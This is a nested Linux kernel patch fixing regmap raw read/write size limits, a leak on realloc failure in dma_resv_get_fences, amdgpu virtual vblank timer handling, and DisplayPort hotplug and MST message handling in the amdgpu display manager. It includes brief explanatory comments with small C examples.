+ static const struct regmap_bus regmap_i2c_smbus_i2c_block = {
+ 	.write = regmap_i2c_smbus_i2c_write,
+ 	.read = regmap_i2c_smbus_i2c_read,
+-	.max_raw_read = I2C_SMBUS_BLOCK_MAX,
+-	.max_raw_write = I2C_SMBUS_BLOCK_MAX,
++	.max_raw_read = I2C_SMBUS_BLOCK_MAX - 1,
++	.max_raw_write = I2C_SMBUS_BLOCK_MAX - 1,
+ };
+ 
+ static int regmap_i2c_smbus_i2c_write_reg16(void *context, const void *data,
+@@ -299,8 +299,8 @@ static int regmap_i2c_smbus_i2c_read_reg16(void *context, const void *reg,
+ static const struct regmap_bus regmap_i2c_smbus_i2c_block_reg16 = {
+ 	.write = regmap_i2c_smbus_i2c_write_reg16,
+ 	.read = regmap_i2c_smbus_i2c_read_reg16,
+-	.max_raw_read = I2C_SMBUS_BLOCK_MAX,
+-	.max_raw_write = I2C_SMBUS_BLOCK_MAX,
++	.max_raw_read = I2C_SMBUS_BLOCK_MAX - 2,
++	.max_raw_write = I2C_SMBUS_BLOCK_MAX - 2,
+ };
+ 
+ static const struct regmap_bus *regmap_get_i2c_bus(struct i2c_client *i2c,
+diff --git a/drivers/base/regmap/regmap-spi-avmm.c b/drivers/base/regmap/regmap-spi-avmm.c
+index 6af692844c196..4c2b94b3e30be 100644
+--- a/drivers/base/regmap/regmap-spi-avmm.c
++++ b/drivers/base/regmap/regmap-spi-avmm.c
+@@ -660,7 +660,7 @@ static const struct regmap_bus regmap_spi_avmm_bus = {
+ 	.reg_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.max_raw_read = SPI_AVMM_VAL_SIZE * MAX_READ_CNT,
+-	.max_raw_write = SPI_AVMM_REG_SIZE + SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
++	.max_raw_write = SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
+ 	.free_context = spi_avmm_bridge_ctx_free,
+ };
+ 
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index 8359164bff903..7de1f27d0323d 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -2064,8 +2064,6 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 	size_t val_count = val_len / val_bytes;
+ 	size_t chunk_count, chunk_bytes;
+ 	size_t chunk_regs = val_count;
+-	size_t max_data = map->max_raw_write - map->format.reg_bytes -
+-			map->format.pad_bytes;
+ 	int ret, i;
+ 
+ 	if (!val_count)
+@@ -2073,8 +2071,8 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 
+ 	if (map->use_single_write)
+ 		chunk_regs = 1;
+-	else if (map->max_raw_write && val_len > max_data)
+-		chunk_regs = max_data / val_bytes;
++	else if (map->max_raw_write && val_len > map->max_raw_write)
++		chunk_regs = map->max_raw_write / val_bytes;
+ 
+ 	chunk_count = val_count / chunk_regs;
+ 	chunk_bytes = chunk_regs * val_bytes;
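The bus-level limits above and this chunking change read as two halves of one accounting fix: max_raw_read/max_raw_write are now treated as pure data-payload budgets, so transports whose hard limit includes the in-band register address (one byte for the 8-bit-register SMBus bus, two for the reg16 variant, SPI_AVMM_REG_SIZE for the AVMM bridge) subtract it when declaring the limit rather than in the core. A small sketch of that budget (I2C_SMBUS_BLOCK_MAX as in the kernel headers; the helper is hypothetical):

#include <assert.h>

#define I2C_SMBUS_BLOCK_MAX 32	/* SMBus block transfer limit, bytes */

/* Data bytes left once the register address rides in the same block. */
static int max_raw_payload(int reg_bytes)
{
	return I2C_SMBUS_BLOCK_MAX - reg_bytes;
}

int main(void)
{
	assert(max_raw_payload(1) == 31);	/* 8-bit register bus  */
	assert(max_raw_payload(2) == 30);	/* 16-bit register bus */
	return 0;
}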
+diff --git a/drivers/dma-buf/dma-resv.c b/drivers/dma-buf/dma-resv.c
+index e3885c90a3acb..f1ba71aed33c3 100644
+--- a/drivers/dma-buf/dma-resv.c
++++ b/drivers/dma-buf/dma-resv.c
+@@ -566,6 +566,7 @@ int dma_resv_get_fences(struct dma_resv *obj, enum dma_resv_usage usage,
+ 	dma_resv_for_each_fence_unlocked(&cursor, fence) {
+ 
+ 		if (dma_resv_iter_is_restarted(&cursor)) {
++			struct dma_fence **new_fences;
+ 			unsigned int count;
+ 
+ 			while (*num_fences)
+@@ -574,13 +575,17 @@ int dma_resv_get_fences(struct dma_resv *obj, enum dma_resv_usage usage,
+ 			count = cursor.num_fences + 1;
+ 
+ 			/* Eventually re-allocate the array */
+-			*fences = krealloc_array(*fences, count,
+-						 sizeof(void *),
+-						 GFP_KERNEL);
+-			if (count && !*fences) {
++			new_fences = krealloc_array(*fences, count,
++						    sizeof(void *),
++						    GFP_KERNEL);
++			if (count && !new_fences) {
++				kfree(*fences);
++				*fences = NULL;
++				*num_fences = 0;
+ 				dma_resv_iter_end(&cursor);
+ 				return -ENOMEM;
+ 			}
++			*fences = new_fences;
+ 		}
+ 
+ 		(*fences)[(*num_fences)++] = dma_fence_get(fence);
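The dma_resv_get_fences() hunk above is the classic realloc anti-pattern repair: writing krealloc_array()'s result straight into the only owning pointer leaks the old array when the allocation fails. A hypothetical userspace equivalent of the corrected pattern:

#include <stdlib.h>

/* Grow *arr to new_len elements without leaking it on failure,
 * mirroring the new_fences temporary introduced above. */
static int grow(int **arr, size_t *len, size_t new_len)
{
	int *tmp = realloc(*arr, new_len * sizeof(**arr));

	if (new_len && !tmp) {
		free(*arr);	/* old block is still valid; release it */
		*arr = NULL;
		*len = 0;
		return -1;
	}
	*arr = tmp;
	*len = new_len;
	return 0;
}

int main(void)
{
	int *a = NULL;
	size_t n = 0;

	return grow(&a, &n, 16) ? 1 : (free(a), 0);
}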
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+index 500a1dc4fe029..d60c4a2eeb0c5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+@@ -55,8 +55,9 @@ static enum hrtimer_restart amdgpu_vkms_vblank_simulate(struct hrtimer *timer)
+ 		DRM_WARN("%s: vblank timer overrun\n", __func__);
+ 
+ 	ret = drm_crtc_handle_vblank(crtc);
++	/* Don't queue timer again when vblank is disabled. */
+ 	if (!ret)
+-		DRM_ERROR("amdgpu_vkms failure on handling vblank");
++		return HRTIMER_NORESTART;
+ 
+ 	return HRTIMER_RESTART;
+ }
+@@ -81,7 +82,7 @@ static void amdgpu_vkms_disable_vblank(struct drm_crtc *crtc)
+ {
+ 	struct amdgpu_crtc *amdgpu_crtc = to_amdgpu_crtc(crtc);
+ 
+-	hrtimer_cancel(&amdgpu_crtc->vblank_timer);
++	hrtimer_try_to_cancel(&amdgpu_crtc->vblank_timer);
+ }
+ 
+ static bool amdgpu_vkms_get_vblank_timestamp(struct drm_crtc *crtc,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index b854eec2787e2..ce5df7927c21f 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -40,6 +40,9 @@
+ #include "dc/dc_stat.h"
+ #include "amdgpu_dm_trace.h"
+ #include "dc/inc/dc_link_ddc.h"
++#include "dpcd_defs.h"
++#include "dc/inc/link_dpcd.h"
++#include "link_service_types.h"
+ 
+ #include "vid.h"
+ #include "amdgpu.h"
+@@ -211,7 +214,7 @@ static void amdgpu_dm_destroy_drm_device(struct amdgpu_display_manager *dm);
+ 
+ static int amdgpu_dm_connector_init(struct amdgpu_display_manager *dm,
+ 				    struct amdgpu_dm_connector *amdgpu_dm_connector,
+-				    uint32_t link_index,
++				    u32 link_index,
+ 				    struct amdgpu_encoder *amdgpu_encoder);
+ static int amdgpu_dm_encoder_init(struct drm_device *dev,
+ 				  struct amdgpu_encoder *aencoder,
+@@ -263,7 +266,7 @@ static u32 dm_vblank_get_counter(struct amdgpu_device *adev, int crtc)
+ static int dm_crtc_get_scanoutpos(struct amdgpu_device *adev, int crtc,
+ 				  u32 *vbl, u32 *position)
+ {
+-	uint32_t v_blank_start, v_blank_end, h_position, v_position;
++	u32 v_blank_start, v_blank_end, h_position, v_position;
+ 
+ 	if ((crtc < 0) || (crtc >= adev->mode_info.num_crtc))
+ 		return -EINVAL;
+@@ -391,7 +394,7 @@ static void dm_pflip_high_irq(void *interrupt_params)
+ 	struct amdgpu_device *adev = irq_params->adev;
+ 	unsigned long flags;
+ 	struct drm_pending_vblank_event *e;
+-	uint32_t vpos, hpos, v_blank_start, v_blank_end;
++	u32 vpos, hpos, v_blank_start, v_blank_end;
+ 	bool vrr_active;
+ 
+ 	amdgpu_crtc = get_crtc_by_otg_inst(adev, irq_params->irq_src - IRQ_TYPE_PFLIP);
+@@ -405,12 +408,12 @@ static void dm_pflip_high_irq(void *interrupt_params)
+ 
+ 	spin_lock_irqsave(&adev_to_drm(adev)->event_lock, flags);
+ 
+-	if (amdgpu_crtc->pflip_status != AMDGPU_FLIP_SUBMITTED){
+-		DC_LOG_PFLIP("amdgpu_crtc->pflip_status = %d !=AMDGPU_FLIP_SUBMITTED(%d) on crtc:%d[%p] \n",
+-						 amdgpu_crtc->pflip_status,
+-						 AMDGPU_FLIP_SUBMITTED,
+-						 amdgpu_crtc->crtc_id,
+-						 amdgpu_crtc);
++	if (amdgpu_crtc->pflip_status != AMDGPU_FLIP_SUBMITTED) {
++		DC_LOG_PFLIP("amdgpu_crtc->pflip_status = %d !=AMDGPU_FLIP_SUBMITTED(%d) on crtc:%d[%p]\n",
++			     amdgpu_crtc->pflip_status,
++			     AMDGPU_FLIP_SUBMITTED,
++			     amdgpu_crtc->crtc_id,
++			     amdgpu_crtc);
+ 		spin_unlock_irqrestore(&adev_to_drm(adev)->event_lock, flags);
+ 		return;
+ 	}
+@@ -678,7 +681,7 @@ static void dmub_hpd_callback(struct amdgpu_device *adev,
+ 	struct drm_connector *connector;
+ 	struct drm_connector_list_iter iter;
+ 	struct dc_link *link;
+-	uint8_t link_index = 0;
++	u8 link_index = 0;
+ 	struct drm_device *dev;
+ 
+ 	if (adev == NULL)
+@@ -779,7 +782,7 @@ static void dm_dmub_outbox1_low_irq(void *interrupt_params)
+ 	struct amdgpu_device *adev = irq_params->adev;
+ 	struct amdgpu_display_manager *dm = &adev->dm;
+ 	struct dmcub_trace_buf_entry entry = { 0 };
+-	uint32_t count = 0;
++	u32 count = 0;
+ 	struct dmub_hpd_work *dmub_hpd_wrk;
+ 	struct dc_link *plink = NULL;
+ 
+@@ -858,7 +861,7 @@ static int dm_set_powergating_state(void *handle,
+ }
+ 
+ /* Prototypes of private functions */
+-static int dm_early_init(void* handle);
++static int dm_early_init(void *handle);
+ 
+ /* Allocate memory for FBC compressed data  */
+ static void amdgpu_dm_fbc_init(struct drm_connector *connector)
+@@ -1045,7 +1048,7 @@ static int dm_dmub_hw_init(struct amdgpu_device *adev)
+ 	struct dmub_srv_hw_params hw_params;
+ 	enum dmub_status status;
+ 	const unsigned char *fw_inst_const, *fw_bss_data;
+-	uint32_t i, fw_inst_const_size, fw_bss_data_size;
++	u32 i, fw_inst_const_size, fw_bss_data_size;
+ 	bool has_hw_support;
+ 
+ 	if (!dmub_srv)
+@@ -1206,10 +1209,10 @@ static void dm_dmub_hw_resume(struct amdgpu_device *adev)
+ 
+ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_addr_space_config *pa_config)
+ {
+-	uint64_t pt_base;
+-	uint32_t logical_addr_low;
+-	uint32_t logical_addr_high;
+-	uint32_t agp_base, agp_bot, agp_top;
++	u64 pt_base;
++	u32 logical_addr_low;
++	u32 logical_addr_high;
++	u32 agp_base, agp_bot, agp_top;
+ 	PHYSICAL_ADDRESS_LOC page_table_start, page_table_end, page_table_base;
+ 
+ 	memset(pa_config, 0, sizeof(*pa_config));
+@@ -1257,7 +1260,7 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 	pa_config->system_aperture.start_addr = (uint64_t)logical_addr_low << 18;
+ 	pa_config->system_aperture.end_addr = (uint64_t)logical_addr_high << 18;
+ 
+-	pa_config->system_aperture.agp_base = (uint64_t)agp_base << 24 ;
++	pa_config->system_aperture.agp_base = (uint64_t)agp_base << 24;
+ 	pa_config->system_aperture.agp_bot = (uint64_t)agp_bot << 24;
+ 	pa_config->system_aperture.agp_top = (uint64_t)agp_top << 24;
+ 
+@@ -1273,6 +1276,21 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 
+ }
+ 
++static void force_connector_state(
++	struct amdgpu_dm_connector *aconnector,
++	enum drm_connector_force force_state)
++{
++	struct drm_connector *connector = &aconnector->base;
++
++	mutex_lock(&connector->dev->mode_config.mutex);
++	aconnector->base.force = force_state;
++	mutex_unlock(&connector->dev->mode_config.mutex);
++
++	mutex_lock(&aconnector->hpd_lock);
++	drm_kms_helper_connector_hotplug_event(connector);
++	mutex_unlock(&aconnector->hpd_lock);
++}
++
+ static void dm_handle_hpd_rx_offload_work(struct work_struct *work)
+ {
+ 	struct hpd_rx_irq_offload_work *offload_work;
+@@ -1281,6 +1299,9 @@ static void dm_handle_hpd_rx_offload_work(struct work_struct *work)
+ 	struct amdgpu_device *adev;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
+ 	unsigned long flags;
++	union test_response test_response;
++
++	memset(&test_response, 0, sizeof(test_response));
+ 
+ 	offload_work = container_of(work, struct hpd_rx_irq_offload_work, work);
+ 	aconnector = offload_work->offload_wq->aconnector;
+@@ -1304,16 +1325,58 @@ static void dm_handle_hpd_rx_offload_work(struct work_struct *work)
+ 	if (amdgpu_in_reset(adev))
+ 		goto skip;
+ 
++	if (offload_work->data.bytes.device_service_irq.bits.UP_REQ_MSG_RDY ||
++		offload_work->data.bytes.device_service_irq.bits.DOWN_REP_MSG_RDY) {
++		dm_handle_mst_sideband_msg_ready_event(&aconnector->mst_mgr, DOWN_OR_UP_MSG_RDY_EVENT);
++		spin_lock_irqsave(&offload_work->offload_wq->offload_lock, flags);
++		offload_work->offload_wq->is_handling_mst_msg_rdy_event = false;
++		spin_unlock_irqrestore(&offload_work->offload_wq->offload_lock, flags);
++		goto skip;
++	}
++
+ 	mutex_lock(&adev->dm.dc_lock);
+-	if (offload_work->data.bytes.device_service_irq.bits.AUTOMATED_TEST)
++	if (offload_work->data.bytes.device_service_irq.bits.AUTOMATED_TEST) {
+ 		dc_link_dp_handle_automated_test(dc_link);
+-	else if ((dc_link->connector_signal != SIGNAL_TYPE_EDP) &&
++
++		if (aconnector->timing_changed) {
++			/* force connector disconnect and reconnect */
++			force_connector_state(aconnector, DRM_FORCE_OFF);
++			msleep(100);
++			force_connector_state(aconnector, DRM_FORCE_UNSPECIFIED);
++		}
++
++		test_response.bits.ACK = 1;
++
++		core_link_write_dpcd(
++		dc_link,
++		DP_TEST_RESPONSE,
++		&test_response.raw,
++		sizeof(test_response));
++	} else if ((dc_link->connector_signal != SIGNAL_TYPE_EDP) &&
+ 			hpd_rx_irq_check_link_loss_status(dc_link, &offload_work->data) &&
+ 			dc_link_dp_allow_hpd_rx_irq(dc_link)) {
+-		dc_link_dp_handle_link_loss(dc_link);
++		/* offload_work->data is from handle_hpd_rx_irq->
++		 * schedule_hpd_rx_offload_work.this is defer handle
++		 * for hpd short pulse. upon here, link status may be
++		 * changed, need get latest link status from dpcd
++		 * registers. if link status is good, skip run link
++		 * training again.
++		 */
++		union hpd_irq_data irq_data;
++
++		memset(&irq_data, 0, sizeof(irq_data));
++
++		/* before dc_link_dp_handle_link_loss, allow new link lost handle
++		 * request be added to work queue if link lost at end of dc_link_
++		 * dp_handle_link_loss
++		 */
+ 		spin_lock_irqsave(&offload_work->offload_wq->offload_lock, flags);
+ 		offload_work->offload_wq->is_handling_link_loss = false;
+ 		spin_unlock_irqrestore(&offload_work->offload_wq->offload_lock, flags);
++
++		if ((read_hpd_rx_irq_data(dc_link, &irq_data) == DC_OK) &&
++			hpd_rx_irq_check_link_loss_status(dc_link, &irq_data))
++			dc_link_dp_handle_link_loss(dc_link);
+ 	}
+ 	mutex_unlock(&adev->dm.dc_lock);
+ 
+@@ -1482,7 +1545,7 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	mutex_init(&adev->dm.audio_lock);
+ 	spin_lock_init(&adev->dm.vblank_lock);
+ 
+-	if(amdgpu_dm_irq_init(adev)) {
++	if (amdgpu_dm_irq_init(adev)) {
+ 		DRM_ERROR("amdgpu: failed to initialize DM IRQ support.\n");
+ 		goto error;
+ 	}
+@@ -1617,9 +1680,8 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	if (amdgpu_dc_debug_mask & DC_DISABLE_STUTTER)
+ 		adev->dm.dc->debug.disable_stutter = true;
+ 
+-	if (amdgpu_dc_debug_mask & DC_DISABLE_DSC) {
++	if (amdgpu_dc_debug_mask & DC_DISABLE_DSC)
+ 		adev->dm.dc->debug.disable_dsc = true;
+-	}
+ 
+ 	if (amdgpu_dc_debug_mask & DC_DISABLE_CLOCK_GATING)
+ 		adev->dm.dc->debug.disable_clock_gate = true;
+@@ -1840,8 +1902,6 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 	mutex_destroy(&adev->dm.audio_lock);
+ 	mutex_destroy(&adev->dm.dc_lock);
+ 	mutex_destroy(&adev->dm.dpia_aux_lock);
+-
+-	return;
+ }
+ 
+ static int load_dmcu_fw(struct amdgpu_device *adev)
+@@ -1850,7 +1910,7 @@ static int load_dmcu_fw(struct amdgpu_device *adev)
+ 	int r;
+ 	const struct dmcu_firmware_header_v1_0 *hdr;
+ 
+-	switch(adev->asic_type) {
++	switch (adev->asic_type) {
+ #if defined(CONFIG_DRM_AMD_DC_SI)
+ 	case CHIP_TAHITI:
+ 	case CHIP_PITCAIRN:
+@@ -2536,7 +2596,7 @@ struct amdgpu_dm_connector *
+ amdgpu_dm_find_first_crtc_matching_connector(struct drm_atomic_state *state,
+ 					     struct drm_crtc *crtc)
+ {
+-	uint32_t i;
++	u32 i;
+ 	struct drm_connector_state *new_con_state;
+ 	struct drm_connector *connector;
+ 	struct drm_crtc *crtc_from_state;
+@@ -2642,7 +2702,7 @@ static void dm_gpureset_commit_state(struct dc_state *dc_state,
+ 		struct dc_scaling_info scaling_infos[MAX_SURFACES];
+ 		struct dc_flip_addrs flip_addrs[MAX_SURFACES];
+ 		struct dc_stream_update stream_update;
+-	} * bundle;
++	} *bundle;
+ 	int k, m;
+ 
+ 	bundle = kzalloc(sizeof(*bundle), GFP_KERNEL);
+@@ -2672,8 +2732,6 @@ static void dm_gpureset_commit_state(struct dc_state *dc_state,
+ 
+ cleanup:
+ 	kfree(bundle);
+-
+-	return;
+ }
+ 
+ static int dm_resume(void *handle)
+@@ -2887,8 +2945,7 @@ static const struct amd_ip_funcs amdgpu_dm_funcs = {
+ 	.set_powergating_state = dm_set_powergating_state,
+ };
+ 
+-const struct amdgpu_ip_block_version dm_ip_block =
+-{
++const struct amdgpu_ip_block_version dm_ip_block = {
+ 	.type = AMD_IP_BLOCK_TYPE_DCE,
+ 	.major = 1,
+ 	.minor = 0,
+@@ -2945,9 +3002,12 @@ static void update_connector_ext_caps(struct amdgpu_dm_connector *aconnector)
+ 	caps->ext_caps = &aconnector->dc_link->dpcd_sink_ext_caps;
+ 	caps->aux_support = false;
+ 
+-	if (caps->ext_caps->bits.oled == 1 /*||
+-	    caps->ext_caps->bits.sdr_aux_backlight_control == 1 ||
+-	    caps->ext_caps->bits.hdr_aux_backlight_control == 1*/)
++	if (caps->ext_caps->bits.oled == 1
++	    /*
++	     * ||
++	     * caps->ext_caps->bits.sdr_aux_backlight_control == 1 ||
++	     * caps->ext_caps->bits.hdr_aux_backlight_control == 1
++	     */)
+ 		caps->aux_support = true;
+ 
+ 	if (amdgpu_backlight == 0)
+@@ -3076,6 +3136,10 @@ void amdgpu_dm_update_connector_after_detect(
+ 						    aconnector->edid);
+ 		}
+ 
++		aconnector->timing_requested = kzalloc(sizeof(struct dc_crtc_timing), GFP_KERNEL);
++		if (!aconnector->timing_requested)
++			dm_error("%s: failed to create aconnector->requested_timing\n", __func__);
++
+ 		drm_connector_update_edid_property(connector, aconnector->edid);
+ 		amdgpu_dm_update_freesync_caps(connector, aconnector->edid);
+ 		update_connector_ext_caps(aconnector);
+@@ -3087,6 +3151,8 @@ void amdgpu_dm_update_connector_after_detect(
+ 		dc_sink_release(aconnector->dc_sink);
+ 		aconnector->dc_sink = NULL;
+ 		aconnector->edid = NULL;
++		kfree(aconnector->timing_requested);
++		aconnector->timing_requested = NULL;
+ #ifdef CONFIG_DRM_AMD_DC_HDCP
+ 		/* Set CP to DESIRED if it was ENABLED, so we can re-enable it again on hotplug */
+ 		if (connector->state->content_protection == DRM_MODE_CONTENT_PROTECTION_ENABLED)
+@@ -3131,6 +3197,8 @@ static void handle_hpd_irq_helper(struct amdgpu_dm_connector *aconnector)
+ 	if (aconnector->fake_enable)
+ 		aconnector->fake_enable = false;
+ 
++	aconnector->timing_changed = false;
++
+ 	if (!dc_link_detect_sink(aconnector->dc_link, &new_connection_type))
+ 		DRM_ERROR("KMS: Failed to detect connector\n");
+ 
+@@ -3170,84 +3238,6 @@ static void handle_hpd_irq(void *param)
+ 
+ }
+ 
+-static void dm_handle_mst_sideband_msg(struct amdgpu_dm_connector *aconnector)
+-{
+-	uint8_t esi[DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI] = { 0 };
+-	uint8_t dret;
+-	bool new_irq_handled = false;
+-	int dpcd_addr;
+-	int dpcd_bytes_to_read;
+-
+-	const int max_process_count = 30;
+-	int process_count = 0;
+-
+-	const struct dc_link_status *link_status = dc_link_get_status(aconnector->dc_link);
+-
+-	if (link_status->dpcd_caps->dpcd_rev.raw < 0x12) {
+-		dpcd_bytes_to_read = DP_LANE0_1_STATUS - DP_SINK_COUNT;
+-		/* DPCD 0x200 - 0x201 for downstream IRQ */
+-		dpcd_addr = DP_SINK_COUNT;
+-	} else {
+-		dpcd_bytes_to_read = DP_PSR_ERROR_STATUS - DP_SINK_COUNT_ESI;
+-		/* DPCD 0x2002 - 0x2005 for downstream IRQ */
+-		dpcd_addr = DP_SINK_COUNT_ESI;
+-	}
+-
+-	dret = drm_dp_dpcd_read(
+-		&aconnector->dm_dp_aux.aux,
+-		dpcd_addr,
+-		esi,
+-		dpcd_bytes_to_read);
+-
+-	while (dret == dpcd_bytes_to_read &&
+-		process_count < max_process_count) {
+-		uint8_t retry;
+-		dret = 0;
+-
+-		process_count++;
+-
+-		DRM_DEBUG_DRIVER("ESI %02x %02x %02x\n", esi[0], esi[1], esi[2]);
+-		/* handle HPD short pulse irq */
+-		if (aconnector->mst_mgr.mst_state)
+-			drm_dp_mst_hpd_irq(
+-				&aconnector->mst_mgr,
+-				esi,
+-				&new_irq_handled);
+-
+-		if (new_irq_handled) {
+-			/* ACK at DPCD to notify down stream */
+-			const int ack_dpcd_bytes_to_write =
+-				dpcd_bytes_to_read - 1;
+-
+-			for (retry = 0; retry < 3; retry++) {
+-				uint8_t wret;
+-
+-				wret = drm_dp_dpcd_write(
+-					&aconnector->dm_dp_aux.aux,
+-					dpcd_addr + 1,
+-					&esi[1],
+-					ack_dpcd_bytes_to_write);
+-				if (wret == ack_dpcd_bytes_to_write)
+-					break;
+-			}
+-
+-			/* check if there is new irq to be handled */
+-			dret = drm_dp_dpcd_read(
+-				&aconnector->dm_dp_aux.aux,
+-				dpcd_addr,
+-				esi,
+-				dpcd_bytes_to_read);
+-
+-			new_irq_handled = false;
+-		} else {
+-			break;
+-		}
+-	}
+-
+-	if (process_count == max_process_count)
+-		DRM_DEBUG_DRIVER("Loop exceeded max iterations\n");
+-}
+-
+ static void schedule_hpd_rx_offload_work(struct hpd_rx_irq_offload_work_queue *offload_wq,
+ 							union hpd_irq_data hpd_irq_data)
+ {
+@@ -3280,7 +3270,7 @@ static void handle_hpd_rx_irq(void *param)
+ 	union hpd_irq_data hpd_irq_data;
+ 	bool link_loss = false;
+ 	bool has_left_work = false;
+-	int idx = aconnector->base.index;
++	int idx = dc_link->link_index;
+ 	struct hpd_rx_irq_offload_work_queue *offload_wq = &adev->dm.hpd_rx_offload_wq[idx];
+ 
+ 	memset(&hpd_irq_data, 0, sizeof(hpd_irq_data));
+@@ -3309,7 +3299,23 @@ static void handle_hpd_rx_irq(void *param)
+ 	if (dc_link_dp_allow_hpd_rx_irq(dc_link)) {
+ 		if (hpd_irq_data.bytes.device_service_irq.bits.UP_REQ_MSG_RDY ||
+ 			hpd_irq_data.bytes.device_service_irq.bits.DOWN_REP_MSG_RDY) {
+-			dm_handle_mst_sideband_msg(aconnector);
++			bool skip = false;
++
++			/*
++			 * DOWN_REP_MSG_RDY is also handled by polling method
++			 * mgr->cbs->poll_hpd_irq()
++			 */
++			spin_lock(&offload_wq->offload_lock);
++			skip = offload_wq->is_handling_mst_msg_rdy_event;
++
++			if (!skip)
++				offload_wq->is_handling_mst_msg_rdy_event = true;
++
++			spin_unlock(&offload_wq->offload_lock);
++
++			if (!skip)
++				schedule_hpd_rx_offload_work(offload_wq, hpd_irq_data);
++
+ 			goto out;
+ 		}
+ 
+@@ -3402,7 +3408,7 @@ static void register_hpd_handlers(struct amdgpu_device *adev)
+ 		aconnector = to_amdgpu_dm_connector(connector);
+ 		dc_link = aconnector->dc_link;
+ 
+-		if (DC_IRQ_SOURCE_INVALID != dc_link->irq_source_hpd) {
++		if (dc_link->irq_source_hpd != DC_IRQ_SOURCE_INVALID) {
+ 			int_params.int_context = INTERRUPT_LOW_IRQ_CONTEXT;
+ 			int_params.irq_source = dc_link->irq_source_hpd;
+ 
+@@ -3411,7 +3417,7 @@ static void register_hpd_handlers(struct amdgpu_device *adev)
+ 					(void *) aconnector);
+ 		}
+ 
+-		if (DC_IRQ_SOURCE_INVALID != dc_link->irq_source_hpd_rx) {
++		if (dc_link->irq_source_hpd_rx != DC_IRQ_SOURCE_INVALID) {
+ 
+ 			/* Also register for DP short pulse (hpd_rx). */
+ 			int_params.int_context = INTERRUPT_LOW_IRQ_CONTEXT;
+@@ -3420,11 +3426,11 @@ static void register_hpd_handlers(struct amdgpu_device *adev)
+ 			amdgpu_dm_irq_register_interrupt(adev, &int_params,
+ 					handle_hpd_rx_irq,
+ 					(void *) aconnector);
+-
+-			if (adev->dm.hpd_rx_offload_wq)
+-				adev->dm.hpd_rx_offload_wq[connector->index].aconnector =
+-					aconnector;
+ 		}
++
++		if (adev->dm.hpd_rx_offload_wq)
++			adev->dm.hpd_rx_offload_wq[connector->index].aconnector =
++				aconnector;
+ 	}
+ }
+ 
+@@ -3437,7 +3443,7 @@ static int dce60_register_irq_handlers(struct amdgpu_device *adev)
+ 	struct dc_interrupt_params int_params = {0};
+ 	int r;
+ 	int i;
+-	unsigned client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
++	unsigned int client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
+ 
+ 	int_params.requested_polarity = INTERRUPT_POLARITY_DEFAULT;
+ 	int_params.current_polarity = INTERRUPT_POLARITY_DEFAULT;
+@@ -3451,11 +3457,12 @@ static int dce60_register_irq_handlers(struct amdgpu_device *adev)
+ 	 *    Base driver will call amdgpu_dm_irq_handler() for ALL interrupts
+ 	 *    coming from DC hardware.
+ 	 *    amdgpu_dm_irq_handler() will re-direct the interrupt to DC
+-	 *    for acknowledging and handling. */
++	 *    for acknowledging and handling.
++	 */
+ 
+ 	/* Use VBLANK interrupt */
+ 	for (i = 0; i < adev->mode_info.num_crtc; i++) {
+-		r = amdgpu_irq_add_id(adev, client_id, i+1 , &adev->crtc_irq);
++		r = amdgpu_irq_add_id(adev, client_id, i + 1, &adev->crtc_irq);
+ 		if (r) {
+ 			DRM_ERROR("Failed to add crtc irq id!\n");
+ 			return r;
+@@ -3463,7 +3470,7 @@ static int dce60_register_irq_handlers(struct amdgpu_device *adev)
+ 
+ 		int_params.int_context = INTERRUPT_HIGH_IRQ_CONTEXT;
+ 		int_params.irq_source =
+-			dc_interrupt_to_irq_source(dc, i+1 , 0);
++			dc_interrupt_to_irq_source(dc, i + 1, 0);
+ 
+ 		c_irq_params = &adev->dm.vblank_params[int_params.irq_source - DC_IRQ_SOURCE_VBLANK1];
+ 
+@@ -3519,7 +3526,7 @@ static int dce110_register_irq_handlers(struct amdgpu_device *adev)
+ 	struct dc_interrupt_params int_params = {0};
+ 	int r;
+ 	int i;
+-	unsigned client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
++	unsigned int client_id = AMDGPU_IRQ_CLIENTID_LEGACY;
+ 
+ 	if (adev->family >= AMDGPU_FAMILY_AI)
+ 		client_id = SOC15_IH_CLIENTID_DCE;
+@@ -3536,7 +3543,8 @@ static int dce110_register_irq_handlers(struct amdgpu_device *adev)
+ 	 *    Base driver will call amdgpu_dm_irq_handler() for ALL interrupts
+ 	 *    coming from DC hardware.
+ 	 *    amdgpu_dm_irq_handler() will re-direct the interrupt to DC
+-	 *    for acknowledging and handling. */
++	 *    for acknowledging and handling.
++	 */
+ 
+ 	/* Use VBLANK interrupt */
+ 	for (i = VISLANDS30_IV_SRCID_D1_VERTICAL_INTERRUPT0; i <= VISLANDS30_IV_SRCID_D6_VERTICAL_INTERRUPT0; i++) {
+@@ -3985,7 +3993,7 @@ static void amdgpu_dm_update_backlight_caps(struct amdgpu_display_manager *dm,
+ }
+ 
